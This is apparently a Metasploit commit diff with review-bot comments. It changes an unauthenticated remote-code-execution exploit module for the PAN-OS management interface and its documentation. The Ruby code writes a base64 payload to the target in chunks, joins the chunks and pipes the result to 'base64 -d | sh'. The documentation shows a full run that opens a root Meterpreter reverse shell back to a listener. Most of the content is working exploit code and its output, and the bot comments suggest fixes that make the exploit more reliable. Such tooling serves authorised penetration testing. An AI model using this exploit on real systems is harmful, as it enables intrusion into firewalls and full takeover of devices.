Commit d2f6e0e

As the payload option FETCH_WRITABLE_DIR may not be available if a non-fetch-based payload is used, we add a new option WRITABLE_DIR to account for this. Update the documentation to reflect the change.
1 parent f9b099a commit d2f6e0e

File tree

2 files changed

+51
-53
lines changed

documentation/modules/exploit/linux/http/panos_management_unauth_rce.md

Lines changed: 41 additions & 49 deletions
@@ -31,6 +31,12 @@ payload `cmd/linux/http/x64/meterpreter_reverse_tcp`.
3131
6. `check`
3232
7. `exploit`
3333

34+
## Options
35+
36+
### WRITABLE_DIR
37+
The full path of a writable directory on the target. By default it will be `/var/tmp`. The exploit will write the
38+
payload as a series if chunks to this location, before executing the payload. The written artifacts are then deleted.
39+
3440
## Scenarios
3541

3642
### Default
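Review bot: typo in the new WRITABLE_DIR description at line 38: "a series if chunks" should read "a series of chunks". The last sentence, "The written artifacts are then deleted.", also reads as if cleanup happens after the payload runs, whereas the exploit method in this same commit builds the command as `rm -f #{datastore['WRITABLE_DIR']}/#{tmp_file_name}*;#{payload.encoded}`, so the chunk files are removed at the start of the decoded command, before the payload executes. Suggest: "The chunk files are removed by the assembled command immediately before the payload is executed."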
@@ -40,43 +46,29 @@ msf6 exploit(linux/http/panos_management_unauth_rce) > show options
4046
4147
Module options (exploit/linux/http/panos_management_unauth_rce):
4248
43-
Name Current Setting Required Description
44-
---- --------------- -------- -----------
45-
Proxies no A proxy chain of format type:host:port[
46-
,type:host:port][...]
47-
RHOSTS 192.168.86.98 yes The target host(s), see https://docs.me
48-
tasploit.com/docs/using-metasploit/basi
49-
cs/using-metasploit.html
50-
RPORT 443 yes The target port (TCP)
51-
SSL true no Negotiate SSL/TLS for outgoing connecti
52-
ons
53-
VHOST no HTTP server virtual host
54-
55-
56-
Payload options (cmd/linux/http/x64/meterpreter_reverse_tcp):
57-
58-
Name Current Setting Required Description
59-
---- --------------- -------- -----------
60-
FETCH_COMMAND WGET yes Command to fetch payload (Acc
61-
epted: CURL, FTP, TFTP, TNFTP
62-
, WGET)
63-
FETCH_DELETE false yes Attempt to delete the binary
64-
after execution
65-
FETCH_FILENAME DVtyQpcA no Name to use on remote system
66-
when storing payload; cannot
67-
contain spaces or slashes
68-
FETCH_SRVHOST no Local IP to use for serving p
69-
ayload
70-
FETCH_SRVPORT 8080 yes Local port to use for serving
71-
payload
72-
FETCH_URIPATH no Local URI to use for serving
73-
payload
74-
FETCH_WRITABLE_DI /var/tmp yes Remote writable dir to store
75-
R payload; cannot contain space
76-
s
77-
LHOST eth0 yes The listen address (an interf
78-
ace may be specified)
79-
LPORT 4444 yes The listen port
49+
Name Current Setting Required Description
50+
---- --------------- -------- -----------
51+
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
52+
RHOSTS 192.168.86.100 yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
53+
RPORT 443 yes The target port (TCP)
54+
SSL true no Negotiate SSL/TLS for outgoing connections
55+
VHOST no HTTP server virtual host
56+
WRITABLE_DIR /var/tmp yes The full path of a writable directory on the target.
57+
58+
59+
Payload options (cmd/linux/http/x64/meterpreter/reverse_tcp):
60+
61+
Name Current Setting Required Description
62+
---- --------------- -------- -----------
63+
FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET)
64+
FETCH_DELETE false yes Attempt to delete the binary after execution
65+
FETCH_FILENAME pHLZiKRnmfR no Name to use on remote system when storing payload; cannot contain spaces or slashes
66+
FETCH_SRVHOST no Local IP to use for serving payload
67+
FETCH_SRVPORT 8080 yes Local port to use for serving payload
68+
FETCH_URIPATH no Local URI to use for serving payload
69+
FETCH_WRITABLE_DIR /var/tmp yes Remote writable dir to store payload; cannot contain spaces
70+
LHOST 192.168.86.42 yes The listen address (an interface may be specified)
71+
LPORT 4444 yes The listen port
8072
8173
8274
Exploit target:
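Review bot: the updated `show options` output now lists the payload as `cmd/linux/http/x64/meterpreter/reverse_tcp`, while the unchanged context at the top of this file (line 31) still refers to `cmd/linux/http/x64/meterpreter_reverse_tcp`; the two should agree. Also, since both `WRITABLE_DIR` and `FETCH_WRITABLE_DIR` now appear with the same `/var/tmp` default, the Options section would benefit from one sentence making clear that they are independent settings: `WRITABLE_DIR` is where this module writes the chunked command, and a fetch payload additionally uses `FETCH_WRITABLE_DIR` for its own binary, so an operator who changes one may also need to change the other.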
@@ -90,29 +82,29 @@ Exploit target:
9082
View the full module info with the info, or info -d command.
9183
9284
msf6 exploit(linux/http/panos_management_unauth_rce) > check
93-
[+] 192.168.86.98:443 - The target is vulnerable.
85+
[+] 192.168.86.100:443 - The target is vulnerable.
9486
msf6 exploit(linux/http/panos_management_unauth_rce) > exploit
9587
9688
[*] Started reverse TCP handler on 192.168.86.42:4444
9789
[*] Running automatic check ("set AutoCheck false" to disable)
9890
[+] The target is vulnerable.
99-
[*] Uploading payload chunk 1 of 8...
100-
[*] Uploading payload chunk 2 of 8...
101-
[*] Uploading payload chunk 3 of 8...
102-
[*] Uploading payload chunk 4 of 8...
103-
[*] Uploading payload chunk 5 of 8...
104-
[*] Uploading payload chunk 6 of 8...
105-
[*] Uploading payload chunk 7 of 8...
106-
[*] Uploading payload chunk 8 of 8...
91+
[*] Uploading payload chunk 1 of 7...
92+
[*] Uploading payload chunk 2 of 7...
93+
[*] Uploading payload chunk 3 of 7...
94+
[*] Uploading payload chunk 4 of 7...
95+
[*] Uploading payload chunk 5 of 7...
96+
[*] Uploading payload chunk 6 of 7...
97+
[*] Uploading payload chunk 7 of 7...
10798
[*] Amalgamating payload chunks...
10899
[*] Executing payload...
109-
[*] Meterpreter session 1 opened (192.168.86.42:4444 -> 192.168.86.98:52364) at 2024-11-19 15:16:55 +0000
100+
[*] Sending stage (3045380 bytes) to 192.168.86.100
101+
[*] Meterpreter session 1 opened (192.168.86.42:4444 -> 192.168.86.100:54266) at 2024-11-21 16:35:38 +0000
110102
111103
meterpreter > getuid
112104
Server username: root
113105
meterpreter > sysinfo
114-
Computer : 192.168.86.98
115-
OS : CentOS 8.3.2011 (Linux 4.18.0-240.1.1.20.pan.x86_64)
106+
Computer : 192.168.86.100
107+
OS : Red Hat (Linux 4.18.0-240.1.1.28.pan.x86_64)
116108
Architecture : x64
117109
BuildTuple : x86_64-linux-musl
118110
Meterpreter : x64/linux

modules/exploits/linux/http/panos_management_unauth_rce.rb

Lines changed: 10 additions & 4 deletions
@@ -48,6 +48,7 @@ def initialize(info = {})
4848
'DefaultOptions' => {
4949
'RPORT' => 443,
5050
'SSL' => true,
51+
# A writable directory on the target for fetch based payloads to write to.
5152
'FETCH_WRITABLE_DIR' => '/var/tmp'
5253
},
5354
'DefaultTarget' => 0,
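Review bot: the `/var/tmp` literal now lives in two places, the `FETCH_WRITABLE_DIR` default here and the `WRITABLE_DIR` default registered below; consider a single constant (or deriving the `FETCH_WRITABLE_DIR` default from `WRITABLE_DIR`) so the two cannot silently drift apart. The new comment could also say explicitly that `FETCH_WRITABLE_DIR` is only consulted by fetch payloads and that non-fetch payloads rely on `WRITABLE_DIR` alone, which is the whole motivation for this change.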
@@ -58,6 +59,11 @@ def initialize(info = {})
5859
}
5960
)
6061
)
62+
register_options(
63+
[
64+
OptString.new('WRITABLE_DIR', [true, 'The full path of a writable directory on the target.', '/var/tmp'])
65+
]
66+
)
6167
end
6268

6369
# Our check routine leverages the two vulnerabilities to write a file to disk, which we then read back over HTTPS to
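Review bot: the new `OptString` for `WRITABLE_DIR` accepts any string, but the value is interpolated unquoted into shell commands in `exploit` (`rm -f #{datastore['WRITABLE_DIR']}/...`, `echo -n '...'>#{datastore['WRITABLE_DIR']}/...`), so a path containing whitespace or shell metacharacters would break the command rather than fail cleanly. The payload option this mirrors already documents "cannot contain spaces"; suggest the same wording in the description and a `fail_with(Failure::BadConfig, ...)` at the top of `exploit` when the value is not an absolute path or contains whitespace, e.g. `fail_with(Failure::BadConfig, 'WRITABLE_DIR must be an absolute path without spaces') unless datastore['WRITABLE_DIR'] =~ %r{\A/\S+\z}`.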
@@ -103,7 +109,7 @@ def check
103109
def exploit
104110
tmp_file_name = Rex::Text.rand_text_alphanumeric(4)
105111

106-
cmd = "rm -f #{datastore['FETCH_WRITABLE_DIR']}/#{tmp_file_name}*;#{payload.encoded}"
112+
cmd = "rm -f #{datastore['WRITABLE_DIR']}/#{tmp_file_name}*;#{payload.encoded}"
107113

108114
payload = Base64.strict_encode64(cmd)
109115

@@ -121,18 +127,18 @@ def exploit
121127

122128
payload = payload[chunk_size..]
123129

124-
execute_cmd("echo -n '#{chunk}'>#{datastore['FETCH_WRITABLE_DIR']}/#{tmp_file_name}#{idx}")
130+
execute_cmd("echo -n '#{chunk}'>#{datastore['WRITABLE_DIR']}/#{tmp_file_name}#{idx}")
125131

126132
idx += 1
127133
end
128134

129135
print_status('Amalgamating payload chunks...')
130136

131-
execute_cmd("cat #{datastore['FETCH_WRITABLE_DIR']}/#{tmp_file_name}* > #{datastore['FETCH_WRITABLE_DIR']}/#{tmp_file_name}")
137+
execute_cmd("cat #{datastore['WRITABLE_DIR']}/#{tmp_file_name}* > #{datastore['WRITABLE_DIR']}/#{tmp_file_name}")
132138

133139
print_status('Executing payload...')
134140

135-
execute_cmd("cat #{datastore['FETCH_WRITABLE_DIR']}/#{tmp_file_name} | base64 -d | sh", dontfail: true)
141+
execute_cmd("cat #{datastore['WRITABLE_DIR']}/#{tmp_file_name} | base64 -d | sh", dontfail: true)
136142
end
137143

138144
def execute_cmd(cmd, dontfail: false)
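Review bot: while these lines are being touched, note that the reassembly step `cat #{datastore['WRITABLE_DIR']}/#{tmp_file_name}* > ...` relies on shell glob expansion order, and chunk names are built as `#{tmp_file_name}#{idx}` with `idx += 1`. Unless `idx` is zero-padded elsewhere, a payload that needs ten or more chunks would be concatenated in lexical order (`1, 10, 11, 2, ...`) and the decoded command would be corrupt; the sample runs in the documentation only show 7 and 8 chunks, so this path is untested. Suggest formatting the suffix with a fixed width (e.g. `format('%03d', idx)`) or concatenating by explicit index in a loop rather than by glob.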
